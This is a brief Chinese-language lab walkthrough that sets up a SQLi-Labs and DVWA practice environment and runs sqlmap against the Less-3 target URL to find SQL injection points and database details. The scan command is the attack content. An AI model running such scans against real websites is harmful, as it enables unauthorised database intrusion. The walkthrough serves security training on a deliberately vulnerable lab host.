实验环境
操作系统:Windows10
安装的应用软件:Sqlmap、FireFox浏览器插件HackBar;Apache、MySQL、PHP;DVWA、SQLi-Labs漏洞网站环境
实验步骤
1.访问SQLi-Labs网站Less-3
http://靶机ip/sql/Less-3
登录后,根据网页提示,先给定一个GET参数:
/http://靶机ip/sql/Less-3/?id=1
2.启动SQLmap
找到SQLmap所在目录输入cmd进入命令行,输入命令启动SQLmap:
python sqlmap.py -h
3.寻找注入点
输入命令自动寻找网站注入点,并获取网站及后台数据库的基本信息:
python sqlmap.py -u http://靶机ip/sql/Less-3/?id=1